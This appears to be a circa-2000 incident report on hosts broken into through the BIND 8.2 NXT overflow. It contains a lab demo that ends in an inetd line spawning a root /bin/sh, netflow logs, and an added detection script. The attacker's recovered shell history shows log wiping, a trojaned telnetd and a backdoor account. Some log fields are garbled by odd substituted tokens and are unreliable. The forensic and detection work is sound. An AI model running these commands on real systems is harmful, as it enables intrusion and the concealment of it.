Hacker compromised
  victim1.ie                              (137.189.victim1)
  victim2.ie                              (137.189.victim2)
  Victim_Net previous intranet gateway    (137.189.victim3)
  Victim_Net current Mail server          (137.189.vicitm4)
The hacker first set up a trap on the DNS server (xx0.yy0.33.45) of a certain domain. He/she started a hacking program bound to port 53 that waited for the victim's DNS query. When the hacker made the victim host send a DNS query to the hacker host (for example with nslookup), the program on the hacker DNS server overflowed a buffer in the victim's named and obtained root access by starting a root shell.
See http://www.cert.org/advisories/CA-99-14-bind.html
A simple demo to show how it works

  Hacker domain                                        bait.hkntec.net
  Hacker DNS server (the DNS server of the
    bait.hkntec.net domain)                            ntec84.fox.hkntec.net (192.168.128.84)
  Victim host (any host running BIND 8.2 named;
    whether it is a DNS server or not does not matter) victim.fox.hkntec.net (192.168.128.50)

The hacker first needs to point the hacker domain (bait.hkntec.net) at the hacker host (192.168.128.84):

; Data file of hostnames in this zone.
;
@       IN      SOA     hkntec.net. shlam.ie.cuhk.edu.hk. (
                        2000007102      ; serial, todays date + todays serial #
                        300             ; refresh, seconds
                        60              ; retry, seconds
                        1W              ; expire, seconds
                        8H )            ; minimum, seconds
        NS      ns.hkntec.net.
;
bait    IN      NS      ntec84.fox.hkntec.net.

At the hacker host (192.168.128.84), probe the victim's BIND version and OS:
[root@ntec84 ~]$ dig @192.168.128.50 version.bind chaos txt | grep \"8
VERSION.BIND.           0S      CHAOS   TXT     "8.2.1"
[root@ntec84 ~]$ telnet 192.168.128.50
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.
Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.12-20 on an i686
login:
Login incorrect

Then the hacker runs the buffer overflow program, which binds to the domain port (53):

ntec84:/tmp> ./bind_hack 1

Now, from any host, make the victim host query the bait.hkntec.net domain:

ntec4:/home/data/shlam> nslookup
Default Server:  fortress.fox.hkntec.net
Address:  192.168.128.230

> server victim.fox.hkntec.net
Default Server:  victim.fox.hkntec.net
Address:  192.168.128.50

> set type=ns
> bait.hkntec.net
Server:  victim.fox.hkntec.net
Address:  192.168.128.50

Non-authoritative answer:
bait.hkntec.net nameserver = ntec84.fox.hkntec.net

Authoritative answers can be found from:
ntec84.fox.hkntec.net   internet address = 192.168.128.84
> set type=a
> www.bait.hkntec.net
Server:  victim.fox.hkntec.net
Address:  192.168.128.50
...

The victim host now tries to resolve www.bait.hkntec.net by querying the hacker DNS server on the domain port (53). When the victim host queries the hacker DNS server, the hacker program overflows a buffer through the NXT record and obtains a root shell on the victim host.

ntec84:/tmp> ./bind_hack 1
Received request from 192.168.128.50:1025 for www.bait.hkntec.net type=1
Entering proxyloop..
Linux victim 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
hostname
victim
echo "ingreslock stream tcp nowait root /bin/sh sh -i" > /tmp/h
/usr/sbin/inetd /tmp/h
ntec84:/tmp> telnet victim ingreslock
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.
bash# whoami
whoami
root
bash#

When you look at the tcpdump, it shows:
victim:/tmp> tcpdump -x -e -s 5000 host ntec84 | tcpf
Kernel filter, protocol ALL, datagram packet socket
14:29:52.475062 eth0 < 0:d0:9:2d:5b:79 0:0:0:0:0:1 ip 1514: ntec84.1101 > victim.domain: P 2899:4347(1448) ack 1 win 32120(DF)
[hex dump of the packet payload omitted]
The real case analysis
Although four hosts were compromised, we only had a chance to examine 137.189.victim2. 137.189.victim1 had its OS upgraded just before we investigated the case. 137.189.victim3 and 137.189.vicitm4 are under Victim_Net management, and Victim_Net did not respond to this investigation. Hence we could only examine 137.189.victim2, which remained quite intact after the break-in.

Feb 22nd
Feb 22nd and afterwards

0222.07:41:46.488 0222.07:41:49.904 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1555 ( ) 10 520
0222.07:42:18.788 0222.07:42:21.648 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1558 ( ) 9 480

The hacker had probably scanned 137.189.victim2 and found that the named port was open. He/she telnetted to 137.189.victim2 to identify its OS.

0222.07:42:57.760 0222.07:42:57.760 137.189.victim2 yyy.63.2.53 11 1024( ) 53 ( domain ) 1 63
0222.07:43:01.464 0222.07:43:01.464 137.189.victim2 yyy.8.10.90 11 1014( ) 53 ( domain ) 1 63
0222.07:43:01.900 0222.07:43:02.760 137.189.victim2 xx0.yy0.33.40 11 1024( ) 53 ( domain ) 2 126
0222.07:43:05.464 0222.07:43:06.464 137.189.victim2 xx0.yy0.33.45 11 1024( ) 53 ( domain ) 2 126

The hacker made 137.189.victim2 query the hacker domain and then connect to the hacker host (xx0.yy0.33.45).

0222.07:43:05.872 0222.07:43:30.544 137.189.victim2 xx0.yy0.33.45 06 53( domain ) 2212 ( ) 13 795

Buffer overflow of the 137.189.victim2 named.

0222.07:43:32.808 0222.07:43:32.808 137.189.victim2 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:43:41.yyy. 0222.07:43:55.hh. 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1559 ( ) 31 1517

Ping 137.189.victim2, then telnet to 137.189.victim2 via his/her established back door.

0222.13:14:46.594 0222.13:14:46.594 137.189.victim2 uuu.254.23.184 06 1109( ) 113 ( auth ) 1 60
0222.13:14:46.82 0222.13:14:46.82 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 1 60
0222.13:14:51.202 0222.13:14:52.614 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1563 ( ) 5 1137
0222.13:15:21.838 0222.13:15:hh.310 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1570 ( ) 5 1207
0222.13:15:16.718 0222.13:15:19.362 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1565 ( ) 8 424
0222.13:15:38.774 0222.13:15:40.270 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1574 ( ) 5 1343
0222.13:15:34.634 0222.13:15:36.842 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1573 ( ) 6 320
0222.13:15:27.770 0222.13:15:33.190 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1572 ( ) 17 892
0222.13:14:47.34 0222.13:15:43.690 137.189.victim2 uuu.254.23.184 06 21( ftp ) 1562 ( ) 46 3742
0222.12:57:57.174 0222.13:16:38.358 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 841 119148
0222.13:17:12.918 0222.13:17:12.918 137.189.victim2 uuu.254.23.184 06 1110( ) 113 ( auth ) 1 60
0222.13:17:11.874 0222.13:17:11.874 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 1 60
0222.13:17:34.153 0222.13:17:35.533 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1591 ( ) 5 268
0222.13:17:30.805 0222.13:17:32.345 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1590 ( ) 5 1405
0222.13:17:27.513 0222.13:17:28.933 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx9 ( ) 5 268
0222.13:17:19.637 0222.13:17:21.169 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) xxx8 ( ) 5 1344
0222.13:17:14.305 0222.13:17:38.341 137.189.victim2 uuu.254.23.184 06 21( ftp ) xxx6 ( ) 36 2923
0222.13:17:37.421 0222.13:17:38.853 137.189.victim2 uuu.254.23.184 06 20(ftp-data ) 1592 ( ) 5 1464
0222.13:17:32.429 0222.13:18:15.77 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 8 1738

Then a lot of FTP transfers.

0222.13:29:51.371 0222.13:29:57.515 137.189.victim2 ggg.233.ttt.6 06 1116( ) 6667 ( ) 8 638
0222.13:30:25.231 0222.13:30:25.563 137.189.victim2 rrr.37.45.2 06 113( auth ) 1434 ( ) 3 124
0222.13:30:54.755 0222.13:30:55.215 137.189.victim2 vvv.161.0.254 06 113( auth ) 1148 ( ) 3 124
0222.13:30:54.291 0222.13:30:56.151 137.189.victim2 vvv.161.0.254 06 1118( ) 6667 ( ) 6 358
0222.13:30:hh.911 0222.13:31:13.183 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 11 705
0222.13:31:22.795 0222.13:31:hh.615 137.189.victim2 ttt.116.202.42 06 113( auth ) 2143 ( ) 3 152
0222.13:31:22.187 0222.13:31:29.215 137.189.victim2 ttt.116.202.42 06 1119( ) 6667 ( ) 7 489
0222.13:31:39.839 0222.13:31:40.267 137.189.victim2 vvv.154.rrr.hh. 06 113( auth ) 2661 ( ) 3 124
0222.13:31:39.427 0222.13:31:41.67 137.189.victim2 vvv.154.rrr.hh. 06 1120( ) 6667 ( ) 6 362
0222.13:32:00.695 0222.13:32:00.695 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74
0222.13:32:00.959 0222.13:32:01.363 137.189.victim2 vvv.159.0.90 06 113( auth ) 1061 ( ) 3 124
0222.13:32:00.547 0222.13:32:02.279 137.189.victim2 vvv.159.0.90 06 1121( ) 6667 ( ) 5 324
0222.13:32:37.843 0222.13:32:38.vvv. 137.189.victim2 fff.163.216.60 06 113( auth ) fff. ( ) 3 164
0222.13:32:37.191 0222.13:32:41.895 137.189.victim2 fff.163.216.60 06 1122( ) 6667 ( ) 8 551
0222.13:32:54.43 0222.13:32:54.387 137.189.victim2 fff.164.211.2 06 113( auth ) 46hh. ( ) 3 124
0222.13:32:53.735 0222.13:32:58.135 137.189.victim2 fff.164.211.2 06 1123( ) 6667 ( ) 7 488
0222.13:33:31.947 0222.13:33:34.419 137.189.victim2 hh.8.4.32 06 1080( ) 3359 ( ) 4 160
0222.13:33:35.723 0222.13:33:35.723 137.189.victim2 rrr.37.45.2 06 1117( ) 6667 ( ) 1 74
0222.13:33:23.167 0222.13:34:11.839 137.189.victim2 199.2.32.11 06 113( auth ) 52273 ( ) 7 284
0222.13:21:27.603 0222.13:34:hh.839 137.189.victim2 uuu.254.23.184 06 23( telnet ) 1539 ( ) 762 61422
0222.13:33:22.443 0222.13:34:52.7 137.189.victim2 199.2.32.11 06 11hh. ) 6667 ( ) 22 mmm.

Start the IRC bot on port 6667.

The other three hosts were also compromised on 22nd Feb.
137.189.victim3

0222.06:12:40.939 0222.06:12:41.263 137.189.victim3 hh.8.44.15 06 53( domain ) 4339 ( ) 3 164
0222.06:25:53.937 0222.06:25:53.937 137.189.victim3 hh.8.44.15 11 53( domain ) 1899 ( ) 1 86
0222.07:35:39.409 0222.07:35:42.585 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1547 ( ) 10 520
0222.07:36:14.829 0222.07:36:14.829 137.189.victim3 fff.41.0.4 11 1028( ) 53 ( domain ) 1 45
0222.07:36:14.485 0222.07:36:14.485 137.189.victim3 ttt.112.36.4 11 1028( ) 53 ( domain ) 1 64
0222.07:36:22.157 0222.07:36:42.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 128
0222.07:36:14.829 0222.07:36:50.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 3 ttt
0222.07:36:18.157 0222.07:37:06.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 3 ttt
0222.07:37:38.157 0222.07:37:38.157 137.189.victim3 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:37:22.157 0222.07:37:58.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 127
0222.07:37:54.157 0222.07:37:54.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 1 63
0222.07:37:50.305 0222.07:38:02.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 2 126
0222.07:38:32.449 0222.07:38:32.449 137.189.victim3 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:38:02.565 0222.07:38:19.521 137.189.victim3 xx0.yy0.33.45 06 53( domain ) 2208 ( ) 13 795
0222.07:38:33.708 0222.07:39:01.640 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1548 ( ) 55 2611
0222.11:45:05.207 0222.11:45:06.695 137.189.victim3 137.189.hh..152 06 139(netbios-s) 2289 ( ) 4 160
0222.11:45:06.707 0222.11:45:09.711 137.189.victim3 137.189.hh..152 01 0( ) 771 ( rtip ) 3 318
0222.12:33:10.52 0222.12:34:33.676 137.189.victim3 xxx.252.36.43 06 23( telnet ) 1056 ( ) 219 50268

137.189.vicitm4

0222.06:12:40.107 0222.06:13:25.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 7 372
0222.06:14:13.431 0222.06:14:13.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:15:49.427 0222.06:15:49.427 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:25:53.897 0222.06:25:53.897 137.189.vicitm4 hh.8.44.15 11 53( domain ) 1895 ( ) 1 86
0222.07:29:00.330 0222.07:29:04.78 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1536 ( ) 11 566
0222.07:30:50.169 0222.07:30:52.961 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 9 486
0222.07:31:04.49 0222.07:31:04.49 137.189.vicitm4 yyy.8.10.90 11 10hh. ) 53 ( domain ) 1 64
0222.07:31:04.693 0222.07:31:04.693 137.189.vicitm4 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 45
0222.07:31:12.601 0222.07:31:32.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 128
0222.07:31:04.693 0222.07:31:40.601 137.189.vicitm4 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:31:51.565 0222.07:31:52.817 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 2 80
0222.07:31:08.601 0222.07:31:56.601 137.189.vicitm4 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:32:12.601 0222.07:32:12.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 1 64
0222.07:32:16.301 0222.07:32:33.201 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1540 ( ) 28 1334
0222.07:32:28.601 0222.07:32:28.601 137.189.vicitm4 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:32:47.577 0222.07:32:57.129 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1541 ( ) 20 988

137.189.victim1

0222.07:39:52.384 0222.07:39:52.384 137.189.victim1 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 63
0222.07:39:52.560 0222.07:40:04.152 137.189.victim1 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 126
0222.07:39:57.44 0222.07:40:00.hh. 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1551 ( ) 10 526
0222.07:39:56.152 0222.07:40:12.152 137.189.victim1 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:00.152 0222.07:40:20.152 137.189.victim1 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:29.792 0222.07:40:29.792 137.189.victim1 sss.188.179.38 11 1033( ) 4000 ( ) 1 38
0222.07:40:20.620 0222.07:40:35.116 137.189.victim1 xx0.yy0.33.45 06 53( domain ) 2211 ( ) 14 847
0222.07:40:52.300 0222.07:40:52.300 137.189.victim1 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:41:13.328 0222.07:41:32.996 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1552 ( ) 45 2131

This is the FTP transfer to McGill U. It matches the information provided by McGill U.

0222.12:57:46.837 0222.12:58:35.685 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 4 156
0222.12:58:25.737 0222.12:58:25.737 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 1 52
0222.12:58:32.517 0222.12:58:32.797 137.189.victim1 mmm.206.73.143 06 113( auth ) 3211 ( ) 3 164
0222.12:58:33.72 0222.12:58:53.756 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 9 506
0222.12:59:04.464 0222.12:59:04.464 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 1 60
0222.12:58:55.396 0222.12:58:55.700 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 2 112
0222.12:59:11.160 0222.12:59:11.160 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 1 60
0222.12:59:04.796 0222.12:59:04.796 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 3 156
0222.12:58:56.36 0222.12:58:56.360 137.189.victim1 mmm.206.73.143 06 113( auth ) 3213 ( ) 3 164
0222.12:59:11.432 0222.12:59:11.432 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 3 156
0222.12:58:56.688 0222.12:59:39.520 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 26 1542
0222.12:59:38.932 0222.12:59:38.932 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 1 60
0222.12:59:39.200 0222.12:59:39.200 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 3 156
0222.12:59:29.108 0222.12:59:29.108 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 3 156
0222.12:59:28.820 0222.12:59:28.820 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 1 60
0222.12:57:48.308 0222.12:59:39.876 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 102 8782
0222.12:59:33.384 0222.12:59:46.832 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 2 76
0222.13:01:09.916 0222.13:01:11.308 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 5 211
0222.13:02:02.892 0222.13:02:02.892 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:10.716 0222.13:03:10.716 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 1 60
0222.13:03:01.656 0222.13:03:hh.328 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 15 915
0222.13:03:20.308 0222.13:03:20.580 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 5 260
0222.13:03:10.1000 0222.13:03:11.944 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 12 624
0222.13:03:20.32 0222.13:03:20.32 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 1 60
0222.13:03:46.8hh. 0222.13:03:46.8hh. 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:01.656 0222.13:04:02.652 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 131 7300
0222.13:05:hh.331 0222.13:05:25.211 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 4 184

cove ftp victim1.ie.cuhk. Mon Feb 21 23:59 - 00:03 (00:04)
Mon Feb 21 23:59:28 2000 1 victim1.ie.cuhk.edu.hk 494 /tmp/egg/specialk.conf b _ o r cove ftp 0 * c
Mon Feb 21 23:59:39 2000 1 victim1.ie.cuhk.edu.hk 749 /tmp/egg/motd b _ o r cove ftp 0 * c
Tue Feb 22 00:03:10 2000 1 victim1.ie.cuhk.edu.hk 28hh. /tmp/egg/special-k.tcl b _ o r cove ftp 0 * c
Tue Feb 22 00:03:20 2000 1 victim1.ie.cuhk.edu.hk 6483 /tmp/egg/BitchX1.1.tcl b _ o r cove ftp 0 * c
(All times are North American Eastern, -0500 from UTC.)

137.189.victim2 was running the eggdrop IRC bot.

April 7th

Got the security alert from McGill U and started the investigation.
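The flow records above can be checked for the sequence the report describes (a UDP query to a host, then a TCP connection from that same host into the victim's port 53, then ICMP and telnet). The following detector is an added example, not part of the original report; the column layout it assumes (start, end, local host, remote host, hex protocol number, local port, remote port, packets, bytes) is inferred from the records, and its sample input is the victim2 records copied from the report with the two anonymised time fields of the telnet record replaced by constructed values.

```python
"""Flag the BIND NXT compromise pattern in flow records like the ones above.

Added example, not part of the original report. Column layout is an
assumption inferred from the records: start, end, local host, remote host,
protocol number in hex (06 TCP, 11 UDP, 01 ICMP), local port with optional
service name in parentheses, remote port likewise, packets, bytes.
"""
import re
from datetime import datetime

# Constructed sample: the victim2 records from the report, with the two
# anonymised time fields of the telnet record replaced by made-up values.
SAMPLE_FLOWS = """\
0222.07:42:57.760 0222.07:42:57.760 137.189.victim2 yyy.63.2.53 11 1024( ) 53 ( domain ) 1 63
0222.07:43:05.464 0222.07:43:06.464 137.189.victim2 xx0.yy0.33.45 11 1024( ) 53 ( domain ) 2 126
0222.07:43:05.872 0222.07:43:30.544 137.189.victim2 xx0.yy0.33.45 06 53( domain ) 2212 ( ) 13 795
0222.07:43:32.808 0222.07:43:32.808 137.189.victim2 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:43:41.000 0222.07:43:55.000 137.189.victim2 xxx.252.35.201 06 23( telnet ) 1559 ( ) 31 1517
"""

FLOW_RE = re.compile(
    r"^(?P<start>\S+) (?P<end>\S+) (?P<local>\S+) (?P<remote>\S+) "
    r"(?P<proto>[0-9a-fA-F]{2}) (?P<lport>\d+)\(\s*(?P<lname>[\w-]*)\s*\) "
    r"(?P<rport>\d+) \(\s*(?P<rname>[\w-]*)\s*\) (?P<pkts>\d+) (?P<bytes>\d+)$"
)

TCP, UDP, ICMP = 6, 17, 1


def parse_time(stamp):
    # Stamps are MMDD.HH:MM:SS.fff with no year; ordering is all we need.
    return datetime.strptime(stamp, "%m%d.%H:%M:%S.%f")


def parse_flows(text):
    """Parse the report's flow format into dicts, sorted by start time."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = FLOW_RE.match(line)
        if not m:
            raise ValueError("unparsed flow record: " + line)
        d = m.groupdict()
        flows.append({
            "start": parse_time(d["start"]), "end": parse_time(d["end"]),
            "local": d["local"], "remote": d["remote"],
            "proto": int(d["proto"], 16),
            "lport": int(d["lport"]), "rport": int(d["rport"]),
            "pkts": int(d["pkts"]), "bytes": int(d["bytes"]),
        })
    return sorted(flows, key=lambda f: f["start"])


def find_nxt_pattern(text, window_seconds=60):
    """One alert per TCP flow into our port 53 that comes from a host we had
    sent a UDP DNS query to within window_seconds beforehand."""
    flows = parse_flows(text)
    alerts = []
    for i, tcp in enumerate(flows):
        # A resolver opens TCP towards a server, not the other way round: a
        # TCP connection into our port 53 from a server we have just queried
        # is the signature of this break-in.
        if not (tcp["proto"] == TCP and tcp["lport"] == 53 and tcp["rport"] > 1023):
            continue
        queries = [q for q in flows[:i]
                   if q["local"] == tcp["local"] and q["remote"] == tcp["remote"]
                   and q["proto"] == UDP and q["rport"] == 53
                   and (tcp["start"] - q["start"]).total_seconds() <= window_seconds]
        if not queries:
            continue
        # Whatever that host did next (the ICMP in the report, new sessions).
        followup = [f["proto"] for f in flows[i + 1:]
                    if f["local"] == tcp["local"] and f["remote"] == tcp["remote"]]
        alerts.append({
            "local": tcp["local"], "remote": tcp["remote"],
            "query_at": queries[-1]["start"], "tcp_at": tcp["start"],
            "payload_bytes": tcp["bytes"], "followup_protos": followup,
        })
    return alerts


if __name__ == "__main__":
    for a in find_nxt_pattern(SAMPLE_FLOWS):
        gap = (a["tcp_at"] - a["query_at"]).total_seconds()
        print(f"{a['local']}: TCP into port 53 from {a['remote']} {gap:.3f}s after "
              f"querying it; {a['payload_bytes']} bytes; later protocols {a['followup_protos']}")
```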
Hacker Activities at 137.189.victim2
From the /.bash_history, we pick up this:

Change the logging:
    whoami
    less /var/log/secure
    pico -w /var/log/secure

Check out the system environment:
    w
    ls
    top
    cat /etc/passwd
    ls /data/home/ansers
    ls /home/testtube
    netstat
    uptime
    finger ansers
    finger testtube
    finger eric
    finger recruit
    ls /data
    df
    ls /data2
    ls /
    ls /download
    cd ..
    cd sbin
    ls
    ls -F
    ls --color
    cd ..
    ls
    cd etc
    ls
    cd ..
    ls
    ls bin
    ls home
    ls
    ls mnt
    ls mnt/cdrom
    ls pef1
    ls usr
    cd usr/sbin
    ls --color
    cd ..
    cd ..
    ls
    cd var
    ls -F
    cd ..
    ls root
    ls root -la
    ls
    ls bin -F

Build and run the eggdrop:
    ls
    cd dev
    ls
    cd ..
    ls
    cd dev
    mkdir e
    cd e
    ncftp
    ls
    tar -zxvf eggdrop1.4.2.tar.gz
    cd eggdrop1.4.2
    ./configure
    make
    cp /tmp/hed .
    ls /tmp
    rm /tmp/hed
    mv /tmp/BitchX1.1.tcl ./scripts/
    mv /tmp/special-k.tcl ./scripts/
    mv /tmp/wh0r3.tcl ./scripts/
    mv /tmp/motd ./
    ls /tmp
    ls
    pico -w hed
    rm hed
    w
    ls
    ./assgroove
    chmod u+x groove
    chmod u+x assgroove
    ./assgroove
    pwd
    ./eggdrop
    ./eggdrop -m assgroove
    telnet localhost 2012

Build the telnet trojan horse:
    w
    cd scripts/
    pico -w botchk
    cd ..
    ls -la
    ps x
    ls
    mv assgroove in.telnetd
    pico -w scripts/botchk
    cd ..
    ./in.telnetd
    ls -la in.tel
    ls -la in.telnetd
    ls
    cd eggdrop1.4.2
    ./in.telnetd
    ls -la in.telnetd
    chmod +x in.telnetd
    pico -w in.telnetd
    pico -w in.telnetd
    pico -w cron
    crontab cron
    crontab -l
    scrbotchk
    ./scripts/botchk
    ls
    ./in.telnetd
    ls in.telnetd
    ls -la in.telnetd
    mv eggdrop in.ftpd
    ./scripts/botchk

Clear the log:
    cd /
    cd var/log
    pico -w secure
    ls
    cat messages
    ls
    rm wtmp
    last
    mv wtmp.1 wtmp
    tail xferlog
    pico -w xferlog
    ls
    cd /root
    ls
    ls -la
    history
    rm .history

Create backdoor account:
    exit
    useradd
    adduser
    /sbin/useradd
    /sbi/nadduser
    /sbin/adduser
    /usr/local/sbin/adduser
    /usr/local/sbin/useradd
    locate
    locate useradd
    /usr/sbin/useradd
    /usr/sbin/useradd deamon -d /tmp
    cat /etc/passwd
    chpasswd
    passwd deamon
    pico -w /etc/passwd

Clear the log:
    w
    w
    cd /var/log
    pico -w secure
    w
    exit
    pico -w secure
    ls
    cat xferlog
    rm xferlog
    ls
    cat lastlog
    ls
    last
    lastlog
    rm lastlog
    ls
    mv wtmp.1 wtmp

Clear the log:
    locate egg
    cd /dev/e/eggdrop1.4.2
    mv /tmp/special-k.1.pre2.tcl ./scripts/
    ls
    cat in.ftpd
    ps x
    pico -w in.telnetd
    logout
    exit
    cp /var/log/wtmp.1 /var/log/wtmp
    cd /dev/e
    ls
    ncftp
    w
    cd /var/log
    ls
    tail secure
    rm secure
    dd > secure
    cat xferlog.1
    ls
    exit
The files that the hacker may have touched on that day (22nd Feb)

Access time               Modification time         File
Mon Apr 10 12:07:55 2000  Tue Feb 22 13:51:27 2000  /
Mon Apr 10 12:07:55 2000  Tue Feb 22 16:16:54 2000  /data/home/ansers/source_code/ansers_dir/src_4
Mon Apr 10 12:07:56 2000  Tue Feb 22 16:03:hh.2000  /data/home/ansers/source_code/jasmine_dir/text
Mon Apr 10 12:07:56 2000  Tue Feb 22 15:51:11 2000  /data/home/ansers/public_html/DDL
Mon Apr 10 12:07:56 2000  Tue Feb 22 15:51:25 2000  /data/home/ansers/public_html/include
Fri Mar 31 23:52:02 2000  Tue Feb 22 15:53:06 2000  /data/home/ansers/public_html/cmpl
Thu Feb hh.19:50:23 2000  Tue Feb 22 11:58:07 2000  /data/home/ansers/public_html/C_prog/upload_batld.c
Wed Mar  1 22:03:03 2000  Tue Feb 22 11:59:55 2000  /data/home/ansers/public_html/C_prog/upload_batle.c
Thu Feb hh.19:51:33 2000  Tue Feb 22 11:58:19 2000  /data/home/ansers/public_html/upload_batld
Thu Feb hh.19:51:33 2000  Tue Feb 22 12:00:23 2000  /data/home/ansers/public_html/upload_batle
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:09:18 2000  /dev/e
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:09:54 2000  /dev/e/eggdrop1.4.2/doc
Tue Feb 22 13:09:54 2000  Tue Feb 22 13:09:55 2000  /dev/e/eggdrop1.4.2/doc/Makefile
Fri Apr  7 03:11:39 2000  Tue Feb 22 13:14:26 2000  /dev/e/eggdrop1.4.2/motd
Mon Apr 10 12:10:00 2000  Tue Feb 22 13:42:16 2000  /dev/e/eggdrop1.4.2/scripts/botchk
Tue Feb 22 13:09:55 2000  Tue Feb 22 13:09:55 2000  /dev/e/eggdrop1.4.2/scripts/Makefile
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:12:16 2000  /dev/e/eggdrop1.4.2/scripts/BitchX1.1.tcl
Mon Mar 27 06:18:10 2000  Tue Feb 22 13:12:30 2000  /dev/e/eggdrop1.4.2/scripts/special-k.tcl
Tue Apr  4 12:31:55 2000  Tue Feb 22 13:12:34 2000  /dev/e/eggdrop1.4.2/scripts/wh0r3.tcl
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:13:21 2000  /dev/e/eggdrop1.4.2/src
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:13:hh.2000  /dev/e/eggdrop1.4.2/src/md5
Tue Feb 22 13:13:21 2000  Tue Feb 22 13:09:56 2000  /dev/e/eggdrop1.4.2/src/md5/Makefile
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:13:25 2000  /dev/e/eggdrop1.4.2/src/md5/md5c.o
